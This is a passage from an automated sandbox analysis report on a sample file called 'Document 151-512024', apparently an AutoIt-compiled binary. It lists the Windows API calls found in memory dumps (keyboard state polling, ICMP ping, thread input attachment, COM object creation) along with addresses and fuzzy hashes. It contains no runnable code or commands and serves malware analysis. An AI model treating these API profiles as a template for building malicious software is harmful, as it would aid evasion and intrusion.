                                                                                                    • GetKeyState.USER32(0000005B), ref: 009A9DEA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: 87de796a5c808f2e05b0981db1b28cd93b6455c0fa4ea9616689bbff2d4a8372
                                                                                                    • Instruction ID: 68ceb95d24d23e4027987676e964bf90473d47be470632180cd4259e92307860
                                                                                                    • Opcode Fuzzy Hash: 87de796a5c808f2e05b0981db1b28cd93b6455c0fa4ea9616689bbff2d4a8372
                                                                                                    • Instruction Fuzzy Hash: E541EB74548BCA6DFF30876084443B5BEF8BF13354F04805AE6C6566C2D7A499C4C7D2
                                                                                                    APIs
                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 009C05BC
                                                                                                    • inet_addr.WSOCK32(?), ref: 009C061C
                                                                                                    • gethostbyname.WSOCK32(?), ref: 009C0628
                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 009C0636
                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009C06C6
                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009C06E5
                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 009C07B9
                                                                                                    • WSACleanup.WSOCK32 ref: 009C07BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                    • String ID: Ping
                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                    • Opcode ID: 51dc3890b8e62267119c0bdc50f92a5285ed6f9fa2641830ecdf646360794b14
                                                                                                    • Instruction ID: 340450f87434be2178a0989c4bac231176d5a98ffa60183278b83aec237966e3
                                                                                                    • Opcode Fuzzy Hash: 51dc3890b8e62267119c0bdc50f92a5285ed6f9fa2641830ecdf646360794b14
                                                                                                    • Instruction Fuzzy Hash: 4C918C75A08201DFD724CF15C989F1ABBE4AF84318F1489ADF4698B6A2C734ED45CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                    • API String ID: 707087890-567219261
                                                                                                    • Opcode ID: 327a5ff1b9a637f74c77e232205c57a8fa53c5b38dc934d27f3a5e946c5b06ac
                                                                                                    • Instruction ID: 8145e0bb77a0c45b2d877f22c7b6fe96ee3df61069db7b647ee1091b77f57f09
                                                                                                    • Opcode Fuzzy Hash: 327a5ff1b9a637f74c77e232205c57a8fa53c5b38dc934d27f3a5e946c5b06ac
                                                                                                    • Instruction Fuzzy Hash: 2F519D31E00116ABCB14EF68C940EBFB7A9BF64724B20462DE826E72C5DB35DE40C791
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32 ref: 009C3774
                                                                                                    • CoUninitialize.OLE32 ref: 009C377F
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,009DFB78,?), ref: 009C37D9
                                                                                                    • IIDFromString.OLE32(?,?), ref: 009C384C
                                                                                                    • VariantInit.OLEAUT32(?), ref: 009C38E4
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009C3936
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                    • API String ID: 636576611-1287834457
                                                                                                    • Opcode ID: 623d8073f77db6f32696fa61c8fcfda1cf8e693674ffcc7af2a3e91e67e0cb92
                                                                                                    • Instruction ID: 040bf36b893517dbeef14a61bf281a70b0b08c4829e42927d89bacb46a5c1ea0
                                                                                                    • Opcode Fuzzy Hash: 623d8073f77db6f32696fa61c8fcfda1cf8e693674ffcc7af2a3e91e67e0cb92
                                                                                                    • Instruction Fuzzy Hash: BA617C70A08311AFD310DF54C849F6AB7E8EF89714F10890DF9859B291D774EE48CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                      • Part of subcall function 0095912D: GetCursorPos.USER32(?), ref: 00959141
                                                                                                      • Part of subcall function 0095912D: ScreenToClient.USER32(00000000,?), ref: 0095915E
                                                                                                      • Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000001), ref: 00959183
                                                                                                      • Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000002), ref: 0095919D
                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 009D8B6B
                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 009D8B71
                                                                                                    • ReleaseCapture.USER32 ref: 009D8B77
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 009D8C12
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009D8C25
                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 009D8CFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                    • String ID: 0n$@GUI_DRAGFILE$@GUI_DROPID
                                                                                                    • API String ID: 1924731296-2804489615
                                                                                                    • Opcode ID: 7a2d8146a50a477e72bb270410226471ac232510e0589e414855057a826843a1
                                                                                                    • Instruction ID: 088b8bcd3bd4a9ce416d1544d1b6a8cce5535658b68fd1e8e11e5458fdf1aa44
                                                                                                    • Opcode Fuzzy Hash: 7a2d8146a50a477e72bb270410226471ac232510e0589e414855057a826843a1
                                                                                                    • Instruction Fuzzy Hash: E7517D70145304AFD700DF24DC96FAA77E4FB88715F40462EF996972E2DB709944CB62
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009B33CF
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009B33F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$_wcslen
                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                    • Opcode ID: 50e4c76f155ea6672faef373485ca0a5fbfbb52ae6ec3886e519d825d55cf358
                                                                                                    • Instruction ID: 7438fdf84314fa6d9e089c0c8bd7d50b1edb253a1a1bc7065dc05721c4513058
                                                                                                    • Opcode Fuzzy Hash: 50e4c76f155ea6672faef373485ca0a5fbfbb52ae6ec3886e519d825d55cf358
                                                                                                    • Instruction Fuzzy Hash: 6A518B7294020ABADF14EBE0DE46EEEB378EF44344F108565F509721A2EB712F58DB61
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                    • API String ID: 1256254125-769500911
                                                                                                    • Opcode ID: c8a042ef174d02c3ba9982be937892d102a455407c267e1d573cbc8bc197a180
                                                                                                    • Instruction ID: 12b5b290a6ae07537d2d1b9fcc0ba085214de66b16da8cde26dee0bcb7712c5a
                                                                                                    • Opcode Fuzzy Hash: c8a042ef174d02c3ba9982be937892d102a455407c267e1d573cbc8bc197a180
                                                                                                    • Instruction Fuzzy Hash: F241E932A000279BCB105F7DC9905BE77A9BFA2BB8B254129E521DB286E735CD81C7D0
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009ABCFD
                                                                                                    • IsMenu.USER32(00000000), ref: 009ABD1D
                                                                                                    • CreatePopupMenu.USER32 ref: 009ABD53
                                                                                                    • GetMenuItemCount.USER32(Pl), ref: 009ABDA4
                                                                                                    • InsertMenuItemW.USER32(Pl,?,00000001,00000030), ref: 009ABDCC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                    • String ID: 0$2$Pl$Pl
                                                                                                    • API String ID: 93392585-182278678
                                                                                                    • Opcode ID: 05281a33f1d650f64c265b5f06e6269d2f01cc4b352eadbe5a50a8c88d6f22ef
                                                                                                    • Instruction ID: a256475740505655403886444590224f474e61375c2217f8c48f0991a027f287
                                                                                                    • Opcode Fuzzy Hash: 05281a33f1d650f64c265b5f06e6269d2f01cc4b352eadbe5a50a8c88d6f22ef
                                                                                                    • Instruction Fuzzy Hash: F7519EB0A042059BDF10CFB8D884BAEBBF8BF86314F14465AF551EB2D2D7709941CBA1
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009B53A0
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009B5416
                                                                                                    • GetLastError.KERNEL32 ref: 009B5420
                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 009B54A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                    • API String ID: 4194297153-14809454
                                                                                                    • Opcode ID: 0d0db4e2635d085b91c17d2d6b2824d3beaf26ec8f432a36e6347434477b3482
                                                                                                    • Instruction ID: 8bbcbcbee431fbbdffba5f0467b80a0c190a9fe28d718d7bc0420d63279ffb5d
                                                                                                    • Opcode Fuzzy Hash: 0d0db4e2635d085b91c17d2d6b2824d3beaf26ec8f432a36e6347434477b3482
                                                                                                    • Instruction Fuzzy Hash: F831F275A006099FD710DF68C688FEABBB9EF44319F158069E405CF2A2DB71DD86CB90
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009AB151
                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB165
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 009AB16C
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB17B
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 009AB18D
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB1A6
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB1B8
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB1FD
                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB212
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB21D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2156557900-0
                                                                                                    • Opcode ID: efd5caede0cce1f1d46db2fadae037b8946d2821f9b8679715c143d8b2475a12
                                                                                                    • Instruction ID: ccffdbd1eaf59b0ac46f97b22b00e092f23260a82269ff58f7534c380c5f0284
                                                                                                    • Opcode Fuzzy Hash: efd5caede0cce1f1d46db2fadae037b8946d2821f9b8679715c143d8b2475a12
                                                                                                    • Instruction Fuzzy Hash: 7231EEBA154205BFDF10DFA4EC48BAD7BADBB26391F108006FA12D6191D7B49E41CFA0
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00972C94
                                                                                                      • Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
                                                                                                      • Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0
                                                                                                    • _free.LIBCMT ref: 00972CA0
                                                                                                    • _free.LIBCMT ref: 00972CAB
                                                                                                    • _free.LIBCMT ref: 00972CB6
                                                                                                    • _free.LIBCMT ref: 00972CC1
                                                                                                    • _free.LIBCMT ref: 00972CCC
                                                                                                    • _free.LIBCMT ref: 00972CD7
                                                                                                    • _free.LIBCMT ref: 00972CE2
                                                                                                    • _free.LIBCMT ref: 00972CED
                                                                                                    • _free.LIBCMT ref: 00972CFB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: e87e11f075a75d61b28e8c5ced452a1592fbe651d0633d65411cd3b060b68594
                                                                                                    • Instruction ID: 1496e59e0edfc934033ac9ee55bcf0aa0887c3ec38cf471ba75d77ca2160d64e
                                                                                                    • Opcode Fuzzy Hash: e87e11f075a75d61b28e8c5ced452a1592fbe651d0633d65411cd3b060b68594
                                                                                                    • Instruction Fuzzy Hash: 6E11B976120108BFCB02EF64D942DDD7BA5FF45350F4584A5FA4C5F222D631EE909B90
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00941459
                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 009414F8
                                                                                                    • UnregisterHotKey.USER32(?), ref: 009416DD
                                                                                                    • DestroyWindow.USER32(?), ref: 009824B9
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0098251E
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0098254B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                    • String ID: close all
                                                                                                    • API String ID: 469580280-3243417748
                                                                                                    • Opcode ID: 88542bc71401b71d229dbc6f71e3c2a327b3df4929b38487ceab4b049effa1fb
                                                                                                    • Instruction ID: 935c57d3d3bb0454ab29dbf065cf264bc484da7e83278564a1b1b8d5d625aae0
                                                                                                    • Opcode Fuzzy Hash: 88542bc71401b71d229dbc6f71e3c2a327b3df4929b38487ceab4b049effa1fb
                                                                                                    • Instruction Fuzzy Hash: 53D148717012128FCB29EF15C499F69F7A4BF45710F1442AEE84AAB362DB30AD56CF50
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009B7FAD
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B7FC1
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009B7FEB
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 009B8005
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B8017
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009B8060
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009B80B0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 769691225-438819550
                                                                                                    • Opcode ID: f660884942a5e2340bdc33b391443763e183ec5c466dac0fc90e45bd76ac297b
                                                                                                    • Instruction ID: 8eb121fa3b228c79927f84024f50fb38bfd4b6646fe244d99934b63b0145ad51
                                                                                                    • Opcode Fuzzy Hash: f660884942a5e2340bdc33b391443763e183ec5c466dac0fc90e45bd76ac297b
                                                                                                    • Instruction Fuzzy Hash: CE818E725082059BCB20EF94C944AEAF3E8AFC9360F144D5EF885D7260EB35DD49CB52
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00945C7A
                                                                                                      • Part of subcall function 00945D0A: GetClientRect.USER32(?,?), ref: 00945D30
                                                                                                      • Part of subcall function 00945D0A: GetWindowRect.USER32(?,?), ref: 00945D71
                                                                                                      • Part of subcall function 00945D0A: ScreenToClient.USER32(?,?), ref: 00945D99
                                                                                                    • GetDC.USER32 ref: 009846F5
                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00984708
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00984716
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0098472B
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00984733
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009847C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                    • String ID: U
                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                    • Opcode ID: 9852954c590ac9eff9c34b1b5d82fc5c9f0a6a8a9b91ef48486c6337597bf2e9
                                                                                                    • Instruction ID: e0cf1af8588ea3ac243748a80a167270c0cd044dd7e4422745e9eaaca4e68ca5
                                                                                                    • Opcode Fuzzy Hash: 9852954c590ac9eff9c34b1b5d82fc5c9f0a6a8a9b91ef48486c6337597bf2e9
                                                                                                    • Instruction Fuzzy Hash: 2171E031400206DFCF21EFA4C984EBA7BB9FF4A325F14426AED565A2A6D3358C81DF50
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009B35E4
